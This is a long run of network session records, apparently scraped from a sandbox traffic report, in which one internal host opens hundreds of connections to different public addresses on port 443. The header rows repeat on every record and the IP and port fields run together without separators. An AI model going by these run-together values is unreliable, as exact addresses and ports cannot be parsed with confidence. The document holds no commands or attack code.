                                                16588192.168.2.2335048132.0.41.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16589192.168.2.2352962142.18.96.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16590192.168.2.2341834222.29.0.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16591192.168.2.234467076.252.168.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16592192.168.2.2334238135.80.58.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16593192.168.2.2353302178.164.144.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16594192.168.2.2344956147.126.121.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16595192.168.2.235315078.82.229.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16596192.168.2.2356346161.55.64.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16597192.168.2.2337510109.84.244.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16598192.168.2.235432657.206.178.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16599192.168.2.2340242105.64.141.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16600192.168.2.2359272118.189.106.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16601192.168.2.2357170216.16.181.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16602192.168.2.235916894.172.171.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16603192.168.2.2336726144.9.69.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16604192.168.2.2344690172.200.127.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16605192.168.2.2350594103.54.241.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16606192.168.2.235443018.253.211.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16607192.168.2.235629297.125.82.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16608192.168.2.2344846123.170.186.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16609192.168.2.233438289.29.252.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16610192.168.2.235957496.159.141.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16611192.168.2.2343844107.72.23.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16612192.168.2.233860094.247.189.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16613192.168.2.2359862167.186.40.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16614192.168.2.2355254217.245.156.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16615192.168.2.2345748140.128.113.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16616192.168.2.233541213.243.212.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16617192.168.2.2343514198.215.44.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16618192.168.2.2334076104.152.184.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16619192.168.2.2334358147.42.17.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16620192.168.2.2346234184.117.44.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16621192.168.2.2344314123.139.31.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16622192.168.2.2332960169.218.171.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16623192.168.2.233377660.68.16.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16624192.168.2.233414886.141.70.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16625192.168.2.234139888.124.108.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16626192.168.2.233753458.47.164.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16627192.168.2.2343296189.145.70.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16628192.168.2.2347304101.196.226.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16629192.168.2.234712295.122.119.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16630192.168.2.2346440185.36.141.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16631192.168.2.2345216142.179.65.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16632192.168.2.233898281.15.136.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16633192.168.2.2351048109.173.132.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16634192.168.2.2336432178.168.103.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16635192.168.2.2350054177.255.183.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16636192.168.2.2356848144.139.58.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16637192.168.2.2350724155.234.111.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16638192.168.2.2349196178.64.236.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16639192.168.2.234270497.228.40.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16640192.168.2.2353920179.40.146.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16641192.168.2.235315461.45.123.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16642192.168.2.2352702184.202.65.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16643192.168.2.23548081.156.93.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16644192.168.2.233554041.6.120.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16645192.168.2.2360414122.228.236.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16646192.168.2.2338794210.155.94.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16647192.168.2.2353850113.119.251.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16648192.168.2.2352988157.53.162.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16649192.168.2.2346186174.184.226.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16650192.168.2.2340182223.185.163.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16651192.168.2.2338144203.182.212.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16652192.168.2.235276436.121.201.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16653192.168.2.2340400116.149.89.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16654192.168.2.2338172119.241.88.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16655192.168.2.2336298102.244.26.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16656192.168.2.235373253.69.82.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16657192.168.2.235460436.58.145.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16658192.168.2.2355530153.98.17.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16659192.168.2.2334808112.87.194.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16660192.168.2.23530522.62.121.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16661192.168.2.2336866118.152.210.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16662192.168.2.235622072.157.126.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16663192.168.2.2352238188.249.26.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16664192.168.2.2359658156.251.180.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16665192.168.2.236081213.0.171.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16666192.168.2.2333536164.178.162.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16667192.168.2.2338478152.224.148.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16668192.168.2.235425844.111.90.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16669192.168.2.2360938153.144.245.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16670192.168.2.235888060.167.189.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16671192.168.2.234826848.149.3.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16672192.168.2.2348628163.54.126.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16673192.168.2.233603414.130.108.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16674192.168.2.2344540107.4.207.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16675192.168.2.235167294.186.55.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16676192.168.2.234807282.242.50.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16677192.168.2.2357542105.149.76.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16678192.168.2.234852647.71.14.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16679192.168.2.2344516206.12.218.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16680192.168.2.234040867.33.205.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16681192.168.2.2353032153.64.238.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16682192.168.2.2346238102.92.173.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16683192.168.2.23354725.87.98.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16684192.168.2.2352756164.134.90.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16685192.168.2.2350712182.57.153.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16686192.168.2.2352800122.42.108.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16687192.168.2.2360430122.216.217.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16688192.168.2.2354810108.27.150.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16689192.168.2.2359344220.50.238.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16690192.168.2.236059832.242.238.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16691192.168.2.233984483.128.161.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16692192.168.2.23602385.249.57.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16693192.168.2.2333558125.164.55.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16694192.168.2.2349380109.127.39.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16695192.168.2.235832625.254.123.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16696192.168.2.235731267.31.217.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16697192.168.2.2350644121.224.83.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16698192.168.2.234508843.68.124.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16699192.168.2.2354642138.20.133.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16700192.168.2.234773045.236.183.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16701192.168.2.2335442181.134.7.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16702192.168.2.23378708.75.63.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16703192.168.2.2340522178.148.0.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16704192.168.2.235297260.47.30.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16705192.168.2.236090045.202.77.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16706192.168.2.2347154137.242.241.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16707192.168.2.2340544164.109.218.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16708192.168.2.2354640202.20.134.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16709192.168.2.2342070207.161.52.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16710192.168.2.235744234.175.184.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16711192.168.2.2357344129.18.91.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16712192.168.2.233321097.9.191.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16713192.168.2.2350454183.100.225.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16714192.168.2.233509896.45.51.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16715192.168.2.234803871.26.136.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16716192.168.2.233483286.82.134.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16717192.168.2.2353866196.159.199.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16718192.168.2.235924078.79.243.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16719192.168.2.235084820.231.81.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16720192.168.2.234267698.94.10.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16721192.168.2.2339120191.164.68.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16722192.168.2.2338864198.30.228.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16723192.168.2.2352240151.64.168.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16724192.168.2.233478896.35.131.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16725192.168.2.2357878120.217.240.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16726192.168.2.2350808177.177.114.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16727192.168.2.2333882123.99.0.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16728192.168.2.2353366213.175.212.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16729192.168.2.233889273.56.85.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16730192.168.2.233801839.21.208.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16731192.168.2.235172474.188.5.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16732192.168.2.236051477.17.182.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16733192.168.2.2333948176.254.88.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16734192.168.2.235542053.244.48.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16735192.168.2.235303468.112.160.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16736192.168.2.2356814181.105.45.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16737192.168.2.2334734101.30.203.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16738192.168.2.2333110151.71.68.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16739192.168.2.234897248.4.206.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16740192.168.2.2356068101.162.221.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16741192.168.2.2354864183.120.181.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16742192.168.2.234954069.145.6.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16743192.168.2.2356404169.11.64.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16744192.168.2.2341642100.41.185.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16745192.168.2.234072092.178.254.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16746192.168.2.233502845.113.58.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16747192.168.2.2357664122.123.227.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16748192.168.2.2357638105.223.184.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16749192.168.2.234019619.226.160.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16750192.168.2.234610671.207.21.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16751192.168.2.235785451.136.218.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16752192.168.2.2343250191.158.186.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16753192.168.2.2342758186.189.228.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16754192.168.2.234121691.204.154.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16755192.168.2.2356776160.95.83.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16756192.168.2.2343220143.163.53.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16757192.168.2.235846291.28.135.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16758192.168.2.2339090197.20.7.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16759192.168.2.2339850144.235.62.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16760192.168.2.2339076103.243.56.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16761192.168.2.233509094.78.172.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16762192.168.2.235095672.199.128.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16763192.168.2.234811274.28.238.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16764192.168.2.2340288183.130.163.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16765192.168.2.2337176109.12.232.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16766192.168.2.233887462.170.250.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16767192.168.2.2356808196.226.63.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16768192.168.2.2354496189.50.208.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16769192.168.2.235014659.122.176.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16770192.168.2.233736278.7.109.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16771192.168.2.2344124172.49.146.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16772192.168.2.2359112101.15.238.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16773192.168.2.2337744131.205.116.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16774192.168.2.233635649.130.232.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16775192.168.2.2339746112.97.12.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16776192.168.2.233781897.83.128.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16777192.168.2.233557068.10.4.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16778192.168.2.234586852.157.103.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16779192.168.2.2341330109.243.162.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16780192.168.2.234646685.136.131.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16781192.168.2.235159251.104.242.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16782192.168.2.2333186222.66.50.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16783192.168.2.2351354138.110.255.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16784192.168.2.2337710114.185.84.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16785192.168.2.2346298206.156.243.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16786192.168.2.233713243.53.131.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16787192.168.2.233867031.46.80.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16788192.168.2.235123498.61.177.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16789192.168.2.2334536182.236.49.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16790192.168.2.233526639.23.117.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16791192.168.2.2337746144.200.170.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16792192.168.2.23432308.195.198.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16793192.168.2.2337982188.217.46.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16794192.168.2.2334608158.3.208.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16795192.168.2.2351110144.69.1.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16796192.168.2.2356270146.20.85.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16797192.168.2.2344380110.69.73.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16798192.168.2.2355378162.214.147.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16799192.168.2.2355856165.242.69.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16800192.168.2.2347200192.15.188.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16801192.168.2.235936682.27.200.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16802192.168.2.235851497.239.162.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16803192.168.2.2350126213.79.17.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16804192.168.2.2333306188.106.189.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16805192.168.2.2342406179.3.254.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16806192.168.2.234912835.118.234.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16807192.168.2.2338734119.44.200.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16808192.168.2.2346472175.31.239.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16809192.168.2.2335454174.96.21.82443
                                                TimestampBytes transferredDirectionData


